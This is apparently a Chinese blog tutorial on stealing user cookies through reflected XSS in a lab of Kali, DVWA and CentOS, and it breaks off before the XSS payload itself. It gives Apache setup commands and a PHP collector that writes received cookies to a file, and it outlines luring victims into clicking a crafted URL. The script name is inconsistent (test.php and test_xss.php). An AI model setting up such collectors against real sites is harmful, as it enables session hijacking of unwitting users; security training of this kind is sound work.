XSS ———— (二)利用反射型XSS窃取用户Cookie信息并利用

思路:

  • 搭建能接收cookie的服务器
  • 构建带有XSS恶意代码的url
  • 发给用户诱导用户点击url
  • 获得用户cookie并利用

实验环境:
kali————充当攻击者接收cookie的服务器 192.168.0.53
DVWA————充当客户要访问的目标网站
centos7————充当用户客户端

小试牛刀:

一、搭建服务器

1. kali开启Apache服务
systemctl start apache2
2. 创建接收cookie的php页面
2.1 在/var/www/html下创建能接收cookie的php页面
vim test.php 内容如下

<?php
$cookie = $_GET['cookie'];	//获取cookie值
file_put_contents('cookie.txt',$cookie);	//将获取的cookie值写入到cookie.txt中
?>

2.2 创建能存储cookie的cookie.txt文本

touch cookie.txt

2.3 给test_xss.php和cookie.txt授权

#查看Apache用的什么权限
ps -aux | grep apache
# 授权
chown www-data:www-data test.php
chown www-data:www-data cookie.txt

在这里插入图片描述
至此我们就创建好了能接收cookie环境了。http://192.168.0.53/test_xss.php

二、制作XSS
  1. 构建XSS payload
<
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值